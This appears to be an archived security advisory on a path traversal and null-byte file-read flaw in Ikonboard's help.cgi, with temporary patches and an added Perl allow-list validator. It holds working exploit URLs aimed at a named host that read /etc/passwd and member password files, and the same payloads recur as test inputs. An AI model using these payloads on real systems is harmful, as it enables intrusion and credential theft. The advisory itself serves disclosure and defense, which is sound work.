COMMAND

    Ikonboard

SYSTEMS AFFECTED

    Ikonboard v2.1.7b

PROBLEM

    Martin J. Muench found the following.  This is another bug in the
    Ikonboard.  Anyone can read any file on the remote system with the
    privileges of the web server.

    File help.cgi (line 44):

        $inhelpon = $query -> param('helpon');

    As we can see, $inhelpon takes the value of the 'helpon' parameter,
    which is then used as follows (lines 95-97):

        $filetoopen = "$ikondir" . "help/$inhelpon.dat";
        $filetoopen = &stripMETA($filetoopen);
        open (FILE, "$filetoopen") or die "Cannot locate the required files";

    Well, it sets the file, runs it through the filter and opens it.

    We are not going to post the whole filter it uses, because they
    really have managed to write a filter that is 24 lines long.  And
    they still forgot to filter the backslash, so we can easily just
    attach the 'poison null-byte' to '$inhelpon' and escape the '.dat'.
    And of course the script doesn't check for "..", so we can specify
    any path we want.

    Example:

        http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00

    would  show  the  password  file,  if  it  is  readable  with  the
    privileges of the web server.

        http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../members/<member>.cgi%00

    replace <member> with the member name and it shows you his/her
    board password (this works with Administrator accounts too).

    Version 2.16b is vulnerable to this attack as well.

SOLUTION

    Not yet available.  You could fix the script temporarily by
    inserting the following line under line 45 in 'help.cgi':

        $inhelpon =~ s/\///g;

    This is lame, but it works.  Another fix for this is simply to
    insert as line 45:

        if($inhelpon =~ /\.\./) { &hackdetected; }

    then at the bottom append:

        sub hackdetected {
            print "Content-type: text/plain\n\n";
            print "sorry, this hole was patched :)\n";
            print "you have been logged.\n";
            exit;
        }

    Of course you could change this to whatever you like.
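    As an added example (not from the advisory and not Ikonboard's own
    code), the following Perl replaces the blacklist approach above with
    an allow-list check on 'helpon' that rejects both the ".." traversal
    and the NUL byte in one rule; the sub name, $ikondir and the sample
    inputs are constructed for the demonstration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical allow-list validation for the 'helpon' parameter.
# Returns the full path of the help file, or undef if the value is
# rejected. Only the topic name is taken from the user; directory
# and extension are fixed by the script.
sub safe_help_path {
    my ($ikondir, $inhelpon) = @_;

    # Reject undefined or empty values before any string handling.
    return undef unless defined $inhelpon && length $inhelpon;

    # A topic name may contain letters, digits, underscore and hyphen
    # only. This single rule excludes '/', '\', '.' (and thus "..")
    # and the NUL byte: the C library call behind open() stops at the
    # first NUL, which is how "%00" chops off the ".dat" suffix.
    return undef unless $inhelpon =~ /\A[A-Za-z0-9_-]{1,64}\z/;

    return $ikondir . "help/" . $inhelpon . ".dat";
}

# Constructed sample inputs: one legitimate topic, the two traversal
# payloads from the advisory, a traversal without NUL, and empty input.
my $ikondir = "/var/www/cgi-bin/ikonboard/";
my @inputs = (
    "posting",
    "../../../../../etc/passwd\0",
    "../members/admin.cgi\0",
    "help/../../etc/passwd",
    "",
);

for my $in (@inputs) {
    my $shown = $in;
    $shown =~ s/\0/\\0/g;    # make the NUL byte visible when printed
    my $path = safe_help_path($ikondir, $in);
    printf "%-36s -> %s\n", "'$shown'", defined $path ? $path : "REJECTED";
}
```

    Only the first input yields a path; every other sample is rejected
    before open() is ever reached.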